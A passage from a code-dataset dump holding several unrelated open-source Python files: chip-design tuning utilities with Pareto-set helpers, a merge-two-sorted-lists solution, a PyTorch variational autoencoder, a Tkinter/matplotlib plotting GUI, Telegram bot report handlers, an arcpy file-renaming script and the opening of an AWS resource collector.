TIMEOUT\")\n results = [\"ERR\", \"ERR\", \"ERR\"]\n portion = [\"ERR\", \"ERR\", \"ERR\"]\n if not \"ERR\" in results: \n for idx in range(len(portion)): \n portion[idx] = 100 + 100 * ((results[idx] - baseline[idx]) / baseline[idx])\n try: \n with open(visited, \"a+\") as fout: \n fout.write(\"Visited\\n\")\n fout.write(str(nameVars) + \"\\n\")\n fout.write(str(variables) + \"\\n\")\n fout.write(str(results) + \"\\n\")\n except Exception: \n pass\n return portion\n\n\ndef evaluate(nameVars, variables, baseline, iter): \n print(\"[ITERATION]:\", iter, \";\", variables)\n configs = {}\n for idx, name in enumerate(nameVars): \n configs[name] = variables[idx]\n basedir = \"run/iter_\" + str(iter)\n configs[\"output\"] = basedir\n outfile = basedir + \"/result.txt\"\n outfile = \"tmp.txt\"\n try: \n runPythonCommand(\"cmd/evaluate.py\", configs, timeout=600, outfile=outfile)\n results = parseResult(outfile)\n except Exception: \n print(\"[EVALUATION]: TIMEOUT\")\n results = [\"ERR\", \"ERR\", \"ERR\"]\n portion = [\"ERR\", \"ERR\", \"ERR\"]\n if not \"ERR\" in results: \n for idx in range(len(portion)): \n portion[idx] = 100 + 100 * ((results[idx] - baseline[idx]) / baseline[idx])\n try: \n with open(\"visited.txt\", \"a+\") as fout: \n fout.write(\"Visited\\n\")\n fout.write(str(nameVars) + \"\\n\")\n fout.write(str(variables) + \"\\n\")\n fout.write(str(results) + \"\\n\")\n except Exception: \n pass\n return portion\n\n\ndef cadenceParse(filename, clkref=2.5): \n slack, power, area = \"ERR\", \"ERR\", \"ERR\"\n with open(filename, \"r\") as fin: \n lines = fin.readlines()\n 
for line in lines: \n splited = line.strip().split()\n if len(splited) >= 3: \n try: \n slack = clkref-float(splited[0])\n power = float(splited[1])\n area = float(splited[2])\n except ValueError: \n slack = \"ERR\"\n power = \"ERR\"\n area = \"ERR\"\n return [slack, power, area]\n\n\ndef cadenceEval(nameVars, variables, baseline, iter): \n print(\"[ITERATION]:\", iter, \";\", variables)\n configs = {}\n for idx, name in enumerate(nameVars): \n configs[name] = variables[idx]\n basedir = \"run/iter_\" + str(iter)\n configs[\"output\"] = basedir\n outfile = basedir + \"/result.txt\"\n outfile = \"tmp.txt\"\n try: \n configs[\"hdl\"] = \"src/gcd.v\"\n configs[\"sdc\"] = \"src/gcd.sdc\"\n runPythonCommand(\"cmd/cadence.py\", configs, timeout=600, outfile=outfile)\n results = cadenceParse(outfile)\n except Exception: \n print(\"[EVALUATION]: TIMEOUT\")\n results = [\"ERR\", \"ERR\", \"ERR\"]\n portion = [\"ERR\", \"ERR\", \"ERR\"]\n if not \"ERR\" in results: \n for idx in range(len(portion)): \n portion[idx] = 100 + 100 * ((results[idx] - baseline[idx]) / baseline[idx])\n try: \n with open(\"visited.txt\", \"a+\") as fout: \n fout.write(\"Visited\\n\")\n fout.write(str(nameVars) + \"\\n\")\n fout.write(str(variables) + \"\\n\")\n fout.write(str(results) + \"\\n\")\n except Exception: \n pass\n return portion\n\n\ndef readTrials(filename): \n with open(filename, \"r\") as fin: \n lines = fin.readlines()\n \n configs = []\n scores = []\n idx = 0\n while idx < len(lines): \n while idx < len(lines) and lines[idx].strip() != \"Visited\": \n idx += 1\n idx += 1\n if idx + 2 >= len(lines): \n break\n nameVars = eval(lines[idx].strip())\n variables = eval(lines[idx + 1].strip())\n results = eval(lines[idx + 2].strip())\n idx += 2\n \n assert len(nameVars) == len(variables)\n config = {}\n for jdx, name in enumerate(nameVars): \n config[name] = variables[jdx]\n configs.append(config)\n scores.append(results)\n \n return configs, scores\n\n\ndef readConfig(filename): \n names = []\n types = []\n ranges = []\n with open(filename, \"r\") as fin: \n lines = fin.readlines()\n for line in lines:\n line = line.strip()\n splited = line.split()\n if len(splited) < 3: \n continue\n name = splited[0]\n typename = splited[1]\n values = splited[2:]\n for idx in range(len(values)): \n if typename == \"int\": \n values[idx] = int(values[idx])\n elif typename == \"float\": \n values[idx] = float(values[idx])\n names.append(name)\n types.append(typename)\n ranges.append(values)\n return names, types, ranges\n \n\ndef runPythonCommand(filename, configs, timeout=None, outfile=None): \n command = [\"python3\", filename, ]\n for key, value in configs.items(): \n if isinstance(value, list) or isinstance(value, tuple): \n for elem in value: \n command.append(\"--\" + key)\n command.append(str(elem))\n else: \n command.append(\"--\" + key)\n command.append(str(value))\n fout = sp.DEVNULL\n if not outfile is None: \n fout = sp.PIPE\n ret = sp.run(command, timeout=timeout, shell=False, stdout=fout, stderr=fout)\n if not outfile is None: \n with open(outfile, \"w\") as fout: \n if ret.stdout.strip() != \"\": \n fout.write(ret.stdout.decode(\"UTF-8\"))\n if ret.stderr.strip() != \"\": \n fout.write(ret.stderr.decode(\"UTF-8\"))\n return ret.returncode\n \n\ndef dominate(a, b): \n assert len(a) == len(b)\n domin1 = True\n domin2 = False\n for idx in range(len(a)): \n if a[idx] > b[idx]: \n domin1 = False\n elif a[idx] < b[idx]: \n domin2 = True\n return domin1 and domin2\n \n\ndef newParetoSet(paretoParams, paretoValues, 
newParams, newValue): \n assert len(paretoParams) == len(paretoValues)\n dupli = False\n removed = set()\n indices = []\n for idx, elem in enumerate(paretoValues): \n if str(paretoParams[idx]) == str(newParams): \n dupli = True\n break\n if dominate(newValue, elem): \n removed.add(idx)\n if dupli: \n return paretoParams, paretoValues\n for idx, elem in enumerate(paretoValues): \n if not idx in removed: \n indices.append(idx)\n newParetoParams = []\n newParetoValues = []\n for index in indices: \n newParetoParams.append(paretoParams[index])\n newParetoValues.append(paretoValues[index])\n bedominated = False\n for idx, elem in enumerate(newParetoValues): \n if dominate(elem, newValue): \n bedominated = True\n if len(removed) > 0:\n assert not bedominated\n if len(removed) > 0 or len(paretoParams) == 0 or not bedominated: \n newParetoParams.append(newParams)\n newParetoValues.append(newValue)\n return newParetoParams, newParetoValues\n \n\ndef pareto(params, values): \n paretoParams = []\n paretoValues = []\n\n for var, objs in zip(params, values): \n paretoParams, paretoValues = newParetoSet(paretoParams, paretoValues, var, objs)\n\n return paretoParams, paretoValues\n \n\nif __name__ == \"__main__\": \n paretoParams = [0, 1, 2, 3, 4, 5, 6, 7]\n paretoValues = [[70.76775036084953, 176.14678899082568, 72.04301075268818], [75.61802643938873, 125.6880733944954, 81.72043010752688], [70.04834238321075, 379.8165137614679, 66.66666666666667], [78.62625151785919, 141.28440366972475, 62.365591397849464], [81.19000160377574, 306.42201834862385, 50.53763440860215], [95.55754118267005, 106.42201834862385, 77.41935483870968], [82.08582491351066, 107.33944954128441, 60.215053763440864], [78.01681673425435, 117.43119266055047, 63.44086021505376]]\n\n newParam = 8\n newValue = [89.75416408916993, 97.24770642201834, 26.88172043010752]\n\n paretoParams, paretoValues = newParetoSet(paretoParams, paretoValues, newParam, newValue)\n print(paretoParams, paretoValues)\n \n\n\n\n\n","repo_name":"shelljane/REMOTune","sub_path":"script/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10291,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"}
+{"seq_id":"14097107017","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n prehead = ListNode(-1)\n curr = prehead\n \n while l1 and l2:\n if l1.val > l2.val:\n curr.next = l2\n l2 = l2.next \n else:\n curr.next = l1\n l1 = l1.next\n curr = curr.next\n if l1 is not None:\n curr.next = l1 \n else:\n curr.next = l2 \n return prehead.next\n ","repo_name":"saviaga/Coding_E","sub_path":"merge-two-sorted-lists/merge-two-sorted-lists.py","file_name":"merge-two-sorted-lists.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"30980937777","text":"import torch\nfrom torch import nn\nimport torchvision\n\nclass VAE(nn.Module):\n def __init__(self, latent_dim, device):\n super(VAE, self).__init__()\n self.device = device\n self.conv1 = nn.Sequential(\n nn.Conv2d(1,32, 3, stride=2, padding=1), # b, 64, 32, 32\n nn.BatchNorm2d(32),\n nn.ReLU()\n )\n self.conv2 = nn.Sequential(\n nn.Conv2d(32, 64, 3, stride=2, padding=1), # b, 128, 16, 16\n nn.BatchNorm2d(64),\n nn.ReLU()\n )\n self.conv3 = nn.Sequential(\n nn.Conv2d(64, 128, 3, stride=2, padding=1), \n nn.BatchNorm2d(128),\n nn.ReLU()\n )\n #self.linear1 = nn.Linear(128*self.H*self.W, 64)\n\n self.mean = nn.Sequential(\n nn.Linear(13312,latent_dim),# b, 64 ==> b, latent_dim\n )\n \n self.var = nn.Sequential(\n nn.Linear(13312,latent_dim),# b, 64 ==> b, latent_dim\n )\n self.decoder = nn.Sequential(\n nn.Linear(latent_dim,13312),# b, latent_dim ==> b, 13312\n nn.BatchNorm1d(13312),\n nn.ReLU(),\n )\n\n self.convTrans1 = nn.Sequential(\n nn.ConvTranspose2d(128, 64, 3, stride=1,padding = 0), \n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.UpsamplingNearest2d(size = [25, 16]),\n )\n self.convTrans2 = nn.Sequential(\n nn.ConvTranspose2d(64, 32, 3, stride=1,padding = 0), \n nn.BatchNorm2d(32),\n nn.ReLU(),\n nn.UpsamplingNearest2d(size = [50, 32]),\n )\n self.convTrans3 = nn.Sequential(\n nn.ConvTranspose2d(32, 1, 3, stride=1,padding = 0), # b, 3, 32, 32\n nn.BatchNorm2d(1),\n nn.UpsamplingNearest2d(size = [100, 64]),\n nn.Sigmoid()\n )\n \n def _sample_z(self, mean, var):\n\n epsilon = torch.randn(mean.shape, device=self.device)\n return mean + epsilon*torch.exp(0.5 * var)\n \n #Encoder\n def _encoder(self, x):\n x = self.conv1(x) \n x = self.conv2(x)\n x = self.conv3(x)\n x = x.view(x.shape[0], -1)\n mean = self.mean(x)\n var = self.var(x)\n return mean,var\n #Decoder\n def _decoder(self, z):\n z = self.decoder(z)\n z = z.view(-1,128,13,8)\n x = self.convTrans1(z)\n x = self.convTrans2(x)\n x = self.convTrans3(x)\n return x\n \n def forward(self, x):\n mean,var = self._encoder(x) #mean and log_variance\n z = self._sample_z(mean, var) \n x = self._decoder(z)\n return x,mean,var,z\n \n def loss(self, x):\n mean, var = self._encoder(x) #\\sigma^2\n \n KL = 0.5 * torch.mean(1 + var- mean**2 - torch.exp(var)) #KLDivvergence\n \n z = self._sample_z(mean, var) \n y = self._decoder(z) \n delta = 1e-7 \n\n reconstruction = torch.mean(x * torch.log(y+delta) + (1 - x) * torch.log(1 - y +delta)) #reconstruction loss\n lower_bound = [KL, reconstruction] \n\n return -sum(lower_bound) ,y,mean,var,z","repo_name":"Reo-I/anomaly-detection","sub_path":"vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"26349005345","text":"#################################################\n### Manipulator ###\n### by Gleb Karmi - MIT License ###\n##################################################\nfrom matplotlib import use\nuse('TkAgg')\n\nfrom numpy import arange, sin, pi, linspace,fmod, copy as np_copy\ntry:\n\tfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg\nexcept :\n\tfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk #Agg\n\n# implement the default mpl key bindings\nfrom matplotlib.backend_bases import key_press_handler\nfrom matplotlib.figure import Figure\nfrom matplotlib.pyplot import connect\nimport matplotlib.pyplot as plt\nimport tkinter as Tk\n\n\nclass CManipulator:\n\t__version__= '01.00.00 (01/06/2020)'\n\tUPDATE_AFTER_RELEASE = False\n\tdpi4fig = 200\n\tXo = arange(0,1,1);param={};prm_tot = 0;prm_prev={};X_label='X';Y_label='Y'\n\troot = Tk.Tk()\n\troot.wm_title(\"Embedding MatplotLib in TK, Manipulator Ver. %s\"%__version__)\n\tprm_string = ''\n\t# Stretch definition for the Figure\n\troot.columnconfigure(10,weight=1);root.columnconfigure(11,weight=1);root.columnconfigure(12,weight=1)\n\troot.columnconfigure(40,pad=1)\n\troot.rowconfigure(1, weight=0);root.rowconfigure(4, weight=1)\n\troot.rowconfigure(30, pad=7)\n\tgrf_title = None\n\tgrf_stile = ['-b',':r','-'] # the last is the default # ',' is a pixel\n\taliased = False\n\tgrid_on = False\n\txLim = [None, None]\n\tyLim = [None, None]\n\tSELF_PLOT_FUNCTION = False\n\tXc,Yc = 0,0\n\n\tdef __init__(self):\n\t\tself.evaluate_now=True\n\t\tself.m_func = self.a_line \n\t\tself.fig = Figure(figsize=(8, 6))#, dpi=100\n\t\t# ax = fig.add_subplot(111)\n\t\tself.fr = Tk.Frame()\n\t\tself.fr.grid(row=25, column=10, columnspan=30, rowspan=30, sticky=Tk.E+Tk.W+Tk.S+Tk.N)\n\n\t\t# canvas = FigureCanvasTkAgg(fig, master=fr) # for pack geometry method \n\t\tself.canvas = FigureCanvasTkAgg(self.fig, master=CManipulator.root) # for grid geometry method\n\t\tself.fig.canvas.mpl_connect('motion_notify_event', self.coursor_position_self)# after FigureCanvasTkAgg\n\t\t#canvas.show()\n\t\tself.canvas.draw()\n\n\t\ttry:\t\n\t\t\tself.toolbar = NavigationToolbar2TkAgg(self.canvas, self.fr)\n\t\texcept:\n\t\t\tself.toolbar = NavigationToolbar2Tk(self.canvas, self.fr)\n\t\tself.toolbar.update()\n\t\tself.update(self.canvas,self.fig)\n\n\t\tself.canvas.get_tk_widget().grid(row=3, column=10, columnspan=30, rowspan=20, sticky=Tk.E+Tk.W+Tk.S+Tk.N)\n\t\t# root.bind(\"\", dummy_function)\n\t\tCManipulator.root.bind(\"\", self.copy2clipboard )\n\n\tdef clear_mnp_params(self):\n\t\tself.evaluate_now=False \n\t\t#! Must turn the flag On before usage. 
While it is False, update() does nothing !#\n\t\ttry: \t\n\t\t\tfor prm_name in self.param.keys():\t\t\n\t\t\t\tself.param[prm_name]['lbl']\t .destroy() #\n\t\t\t\tself.param[prm_name]['min_lbl'].destroy() #\n\t\t\t\tself.param[prm_name]['max_lbl'].destroy() #\n\t\t\t\tself.param[prm_name]['scale'] .destroy() #\n\t\texcept Exception as e:\n\t\t\tpass\t\n\t\t\t\t\n\t\tself.param, self.prm_prev = {}, {}\n\t\tself.prm_tot = 0\t\t\n\n\t# copy a matplotlib figure to clipboard as BMP on windows\n\t# http://stackoverflow.com/questions/7050448/write-image-to-windows-clipboard-in-python-with-pil-and-win32clipboard\n\tdef copy2clipboard(self,event, figure=None):\n\t\tfrom io import BytesIO as StringIO\n\t\tfrom time import sleep\n\t\tfrom PIL import Image\n\t\timport win32clipboard\n\n\t\tif figure:\n\t\t self.fig = figure\n\t \n\t\toutput = StringIO()\n\t\t# fig.savefig(output, format='bmp') # bmp not supported\n\t\tdpi = self.fig.get_dpi()\n\t\tself.fig.set_dpi(self.dpi4fig) \n\t\tself.fig.canvas.draw()\n\t\tbuf = self.fig.canvas.buffer_rgba()\n\t\tw = int(self.fig.get_figwidth() * self.fig.dpi)\n\t\th = int(self.fig.get_figheight() * self.fig.dpi)\n\t\t# im = Image.frombuffer('RGBA', (w,h), buf)\n\t\t# II = im.transpose(Image.FLIP_TOP_BOTTOM).convert(\"RGB\")\n\t\t# II.save(output, \"BMP\") # \"JPEG\")# \n\t\tim = Image.frombuffer('RGBA', (w,h), buf, 'raw', 'RGBA', 0, 1)\n\t\tim.save(output, \"BMP\") # \"JPEG\")#\n\n\t\tdata = output.getvalue()[14:] # The file header off-set of BMP is 14 bytes\n\t\toutput.close()\n\n\t\ttry:\n\t\t win32clipboard.OpenClipboard()\n\t\t win32clipboard.EmptyClipboard()\n\t\t # win32clipboard.SetClipboardData(win32clipboard.CF_BITMAP, data) # did not work!\n\t\t win32clipboard.SetClipboardData(win32clipboard.CF_DIB, data) # DIB = device independent bitmap \n\t\t win32clipboard.CloseClipboard()\n\t\texcept:\n\t\t sleep(0.2)\n\t\t self.copy2clipboard(event, figure)\n\t\tself.fig.set_dpi(dpi) \n\t\tself.fig.canvas.draw()\n\n\tdef a_line(self,x):\n\t\t'''a simple line'''\n\t\treturn x;\t\n\n\tdef coursor_position(self):\t\t\t\n\t\treturn [self.Xc,self.Yc]\n\n\tdef get_manip_axis(self):\n\t\treturn self.fig.gca()\t\n\n\tdef get_manip_frame(self):\n\t\treturn self.fr\n\t\t\n\tdef coursor_position_self(self,event):\t\n\t\tself.Xc, self.Yc = event.xdata, event.ydata \n\t\treturn [self.Xc,self.Yc]\n\n\tdef set_parameter_slider(self,prm_MIN,prm_MAX,prm_VAL,prm_res,prm_name,tickinterval=0):\n\t\tself.prm_tot +=1 \n\t\tself.param[prm_name] = {}\n\t\tself.param[prm_name]['min'] = prm_MIN\n\t\tself.param[prm_name]['max'] = prm_MAX\n\t\tself.param[prm_name]['val'] = prm_VAL\n\t\tself.param[prm_name]['res'] = prm_res\n\t\t\n\t\tself.param[prm_name]['lbl'] = Tk.Label(CManipulator.root, text=prm_name)\n\t\tself.param[prm_name]['lbl'].grid(column=self.prm_tot, row=1, sticky=Tk.S) \n\t\tself.param[prm_name]['min_lbl'] = Tk.Label(CManipulator.root, text=prm_MIN)\n\t\tself.param[prm_name]['min_lbl'].grid(column=self.prm_tot, row=2, sticky=Tk.S) \n\t\tself.param[prm_name]['max_lbl'] = Tk.Label(CManipulator.root, text=prm_MAX)\n\t\tself.param[prm_name]['max_lbl'].grid(column=self.prm_tot, row=25, sticky=Tk.S) \n\t\tself.param[prm_name]['scale'] = Tk.Scale(CManipulator.root, from_=prm_MIN, to=prm_MAX, orient=Tk.VERTICAL, length=450,\n\t\t\tlabel='', resolution=prm_res,showvalue=0,tickinterval=tickinterval)\n\t\tself.param[prm_name]['scale'].set(prm_VAL)\n\t\tself.param[prm_name]['scale'].grid(column=self.prm_tot, row=4, columnspan=1, rowspan=20,padx=5, 
sticky=Tk.E+Tk.W+Tk.S+Tk.N)\n\t\t\n\t\tself.prm_prev[prm_name] = self.param[prm_name].copy(); \n\t\t# prm_prev[prm_name] = prm_VAL - 1\n\t\tif self.UPDATE_AFTER_RELEASE:\n\t\t\tself.param[prm_name]['scale'].bind(\"<ButtonRelease-1>\", lambda event: self.update(self.canvas,self.fig))\n\n\t\tself.evaluate_now = True\n\n\tdef update_scale(self,prm_name,prm_MIN=None,prm_MAX=None,prm_res=None,prm_VAL=None): # \n\t\tif prm_MIN:\n\t\t\tself.param[prm_name]['min_lbl']['text'] = '%.3f'%prm_MIN\n\t\t\tif self.param[prm_name]['scale'].get() < prm_MIN:\n\t\t\t\tself.param[prm_name]['scale'].set(prm_MIN)\n\t\t\tself.param[prm_name]['scale'].configure(from_=prm_MIN)\n\t\tif prm_MAX:\n\t\t\tself.param[prm_name]['max_lbl']['text'] = '%.3f'%prm_MAX\n\t\t\tself.param[prm_name]['scale'].configure(to=prm_MAX)\n\t\tif prm_res:\n\t\t\tself.param[prm_name]['scale'].configure(resolution=prm_res)\n\t\tif prm_VAL:\n\t\t\tself.param[prm_name]['scale'].set(prm_VAL)\n\n\tdef update(self,canvas,fig):\n\t\tX = self.Xo\n\t\tax = self.fig.gca() # valid for all cases except SELF_PLOT_FUNCTION\n\t\tself.prm_string = ''\n\t\tneed_an_update_this_time = False\n\t\tfor prm_name in self.param.keys():\n\t\t\tself.prm_string += prm_name+'='+str(self.param[prm_name]['scale'].get())+';'\n\t\t\tif self.evaluate_now and (self.prm_prev[prm_name] != self.param[prm_name]['scale'].get()):\n\t\t\t\tself.prm_prev[prm_name] = self.param[prm_name]['scale'].get()\n\t\t\t\tax.clear()\n\t\t\t\tneed_an_update_this_time = True # Some parameters were updated & evaluate_now is valid\n\t\t\t\n\t\tif need_an_update_this_time:\n\t\t\tif self.SELF_PLOT_FUNCTION:\n\t\t\t\t# the self.m_func(ax) is updating the graph. No other inputs to the function\n\t\t\t\t# all the parameters are globals\n\t\t\t\tself.m_func(self.fig) \n\t\t\telse:\n\t\t\t\tif type(self.m_func) is list:\t\t\t\n\t\t\t\t\tif self.grf_title == None:\n\t\t\t\t\t\tif self.m_func[0].__doc__ == None:\n\t\t\t\t\t\t\tself.grf_title = \"Manipulator Ver. %s; Add your title via grf_title parameter.\"%__version__\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.grf_title = self.m_func[0].__doc__\n\n\t\t\t\t\tfor grf in range(len(self.m_func)):\n\t\t\t\t\t\ty = self.m_func[grf](X)\t# X[grf]\n\t\t\t\t\t\tif len(y) == 2:\n\t\t\t\t\t\t\tX,y = y[0], y[1]\n\t\t\t\t\t\tax.plot(X, y,self.grf_stile[min(grf,len(self.grf_stile)-1)], antialiased=self.aliased)\n\t\t\t\t\tax.set_title( self.grf_title+'\\n'+self.prm_string)\n\n\t\t\t\telse:\n\t\t\t\t\tif self.grf_title == None:\n\t\t\t\t\t\tif self.m_func.__doc__ == None:\n\t\t\t\t\t\t\tself.grf_title = \"Manipulator Ver. 
%s; Add your title via grf_title parameter.\"%__version__\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.grf_title = self.m_func.__doc__\n\n\t\t\t\t\ty = self.m_func(X)\n\t\t\t\t\tif len(y) == 2:\n\t\t\t\t\t\tX,Y = y[0], y[1]\n\t\t\t\t\telse:\n\t\t\t\t\t\tY = y\n\t\t\t\t\tgrf = 0\n\t\t\t\t\tax.plot(X, Y,self.grf_stile[min(grf,len(self.grf_stile)-1)], antialiased=self.aliased)\n\t\t\t\t\tax.set_title( self.grf_title+'\\n'+self.prm_string)\n\n\t\t\t\tax.grid(self.grid_on)\n\t\t\t\tif self.xLim[0]:\n\t\t\t\t\tax.set_xlim(self.xLim)\n\t\t\t\tif self.yLim[0]:\n\t\t\t\t\tax.set_ylim(self.yLim)\n\t\t\t\tax.set_xlabel(self.X_label )\n\t\t\t\tax.set_ylabel(self.Y_label )\t\t\t\n \t\n\t\tcanvas.draw()\n\t\tif not CManipulator.UPDATE_AFTER_RELEASE:\n\t\t\t# call update function every 100ms with params *(canvas,self.fig)\n\t\t\tCManipulator.root.after(100, self.update,*(canvas,self.fig)) \n\n\n## Unit TEST ##################################################################\n# if __name__ == '__main__':\n# \tdef bernoulli_map(x):\n# \t\t'''$ X_{N+1} = 2 X_{N}$ mod 1 ''' \n# \t\treturn fmod(2.*x ,1.)\n\n# \tdef same_val(x):\n# \t\treturn x \n\n# \tdef bernoulli_N_iteration(x,N=0):\t\t\n# \t\t'''N iteration of bernoulli map ''' \t\n# \t\tglobal gui\n# \t\tif N == 0:\n# \t\t\tN=gui.param['iter']['scale'].get()\n# \t\txn = np_copy(x)\n# \t\tfor i in range(N):\n# \t\t\ty = bernoulli_map(xn)\n# \t\t\txn = np_copy(y)\n# \t\treturn y\n\n# \tgui = CManipulator()\n\n# \tgui.Xo = arange(0.0, 1.0, 0.001)\n# \tgui.grf_title = '$N_{th}$ iteration of Bernoulli map; '\n# \tgui.X_label = '$X_{ N}$'\n# \tgui.Y_label = '$X_{N+1}$'\n# \tgui.grf_stile =['-b',':r','-']\n# \tgui.set_parameter_slider(prm_MIN=1,prm_MAX=10,prm_VAL=2,prm_res=1,prm_name='iter')\n# \tgui.set_parameter_slider(prm_MIN=-10.,prm_MAX=23.,prm_VAL=0.,prm_res=0.01,prm_name='r')\n# \tgui.m_func = [bernoulli_N_iteration,same_val]\n# \tTk.mainloop()\n\n\n## Updates ########################################################\t\n# \n# - Now all the app is with grid instead of pack geometry method \n# - Object Oriented implementation of Manipulator\n# \n## TBDs ############################################################\t\n# - self.evaluate_now True review\n# - MIT Licence\n# - Status line: \"Ctrl+C for copying figure; Space bar for toggle grid\n# - Settings window","repo_name":"glebkarmi/Manipulator","sub_path":"manipulator.py","file_name":"manipulator.py","file_ext":"py","file_size_in_byte":10258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"73239692880","text":"from aiogram import Dispatcher\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.types import Message, ReplyKeyboardRemove\nfrom aiogram.dispatcher.filters import Text, Regexp\n\nfrom services.db_interaction import DB\nfrom services.common import parse_custom_date_period\nfrom states.states import *\nfrom keyboards.trigger_report import *\nfrom keyboards.emotion_report import period_keyboard, custom_period_button\nfrom messages.emotion_report import report_choose_message, custom_period_message, cant_parse_period_message\n\nfrom messages.trigger_report import *\nfrom keyboards.common import *\nfrom handlers.user_start import user_start\nfrom visualization.trigger_report import get_emotion_triggers_report\nimport os\n\n\nasync def set_trigger_report_period(message: Message, db: DB, state: FSMContext):\n await db.log_message(message)\n await state.set_state(TriggersReport.choose_period_for_report)\n if message.text == custom_period_button:\n await message.reply(custom_period_message, reply_markup=ReplyKeyboardRemove(), reply=False)\n else:\n await message.reply(report_choose_message, reply_markup=period_keyboard, reply=False)\n\n\nasync def show_emotions_with_triggers(message: Message, db: DB, state: FSMContext):\n await db.log_message(message)\n try:\n date_first, date_second = parse_custom_date_period(message.text)\n await state.update_data(date_first=str(date_first), date_second=str(date_second))\n available_emotions = await db.get_available_emotions_for_report_period(message.from_id, date_first=date_first,\n date_second=date_second)\n except:\n try:\n days = int(message.text)\n await state.update_data(days_for_report=days)\n available_emotions = await db.get_available_emotions_for_report(message.from_id, days=days)\n except:\n await message.reply(cant_parse_period_message, reply=False)\n return\n if available_emotions is not None:\n await state.set_state(TriggersReport.choose_emotion_for_report)\n await state.update_data(available_emotions=available_emotions)\n keyboard = generate_trigger_report_keyboard(available_emotions)\n await message.reply(choose_emotion_for_report_message, reply_markup=keyboard, reply=False)\n else:\n await message.reply(you_didnt_collect_triggers_message, reply=False)\n await set_trigger_report_period(message, db, state)\n\n\nasync def show_trigger_report(message: Message, db: DB, state: FSMContext):\n await db.log_message(message)\n data = await state.get_data()\n if message.text not in data.get('available_emotions'):\n await message.reply(wrong_emotion_message, reply=False)\n return\n emotion_for_report = message.text\n days = data.get('days_for_report')\n date_first = data.get('date_first')\n date_second = data.get('date_second')\n if date_first is not None and date_second is not None:\n trigger_report = await db.get_triggers_report_period(message.from_id, date_first, date_second, emotion_for_report)\n else:\n trigger_report = await db.get_triggers_report(message.from_id, days, emotion_for_report)\n report = await get_emotion_triggers_report(trigger_report, emotion_for_report, days, date_first, date_second)\n await message.reply_photo(open(report, 'rb'), reply=False, reply_markup=home_keyboard)\n try:\n os.remove(report)\n except:\n pass\n await state.finish()\n\n\n\n\ndef trigger_report_register(dp: Dispatcher):\n dp.register_message_handler(set_trigger_report_period, commands=[\"trigger_report\"], state=\"*\")\n dp.register_message_handler(set_trigger_report_period, Text(equals=triggers_report_button), state=\"*\")\n 
dp.register_message_handler(set_trigger_report_period, Text(equals=custom_period_button),\n state=TriggersReport.choose_period_for_report)\n dp.register_message_handler(user_start, Text(equals=main_page_button), state=TriggersReport.choose_emotion_for_report)\n dp.register_message_handler(show_emotions_with_triggers, Regexp(regexp='\\d+'), state=TriggersReport.choose_period_for_report)\n dp.register_message_handler(show_trigger_report, state=TriggersReport.choose_emotion_for_report)\n\n\n","repo_name":"MaxSheptyakov/Emphatix","sub_path":"handlers/trigger_report.py","file_name":"trigger_report.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"40380876391","text":"#################################\n#FILE: takehome1.py\n#AUTHOR:Kelsey Herndon\n#EMAIL: keh0023@uah.edu \n#MODIFIED BY: N/A\n#ORGANIZATION: University of Alabama in Huntsville; Department of Atmospheric Science\n#CREATION DATE: 2/22/2017\n#LAST MOD DATE: 2/26/2017\n#PURPOSE: This script adds a desired suffix to a file name\n#DEPENDENCIES: arcpy\n#################################\n\n# Import system modules\nimport arcpy\n\n##Get the variables from ArcMap\n#get the workspace location\nworkspace = arcpy.GetParameterAsText(0) \n#get the original file (to be renamed)\nin_data = arcpy.GetParameterAsText(1)\n#get the desired suffix for the file (note: this is not the file type, for example .tif, .jpeg, etc.)\nsuffix = arcpy.GetParameterAsText(2)\n\n##Define the workspace\narcpy.env.workspace = workspace\n\n##Define the new name of the file \nout_data = in_data[0:-4] + suffix\n\n##Execute Rename\narcpy.Rename_management(in_data, out_data, \"raster\")\n","repo_name":"herndk1/UAHcourse_IntroToPython","sub_path":"HMWRK_AddSuffixToFile_arcpyTool.py","file_name":"HMWRK_AddSuffixToFile_arcpyTool.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"13781101913","text":"from collections import defaultdict\n\nfrom botocore.exceptions import ClientError\nfrom datetime import datetime, timedelta\nfrom cloud_inquisitor import get_aws_session\nfrom cloud_inquisitor.config import dbconfig, ConfigOption\nfrom cloud_inquisitor.database import db\nfrom cloud_inquisitor.exceptions import InquisitorError\nfrom cloud_inquisitor.plugins import BaseCollector, CollectorType\nfrom cloud_inquisitor.plugins.types.accounts import AWSAccount\nfrom cloud_inquisitor.plugins.types.resources import S3Bucket, CloudFrontDist, DNSZone, DNSRecord\nfrom cloud_inquisitor.utils import get_resource_id\nfrom cloud_inquisitor.wrappers import retry\n\n\nclass AWSAccountCollector(BaseCollector):\n name = 'AWS Account Collector'\n ns = 'collector_ec2'\n type = CollectorType.AWS_ACCOUNT\n interval = dbconfig.get('interval', ns, 15)\n s3_collection_enabled = dbconfig.get('s3_bucket_collection', ns, True)\n cloudfront_collection_enabled = dbconfig.get('cloudfront_collection', ns, True)\n route53_collection_enabled = dbconfig.get('route53_collection', ns, True)\n\n options = (\n ConfigOption('s3_bucket_collection', True, 'bool', 'Enable S3 Bucket Collection'),\n 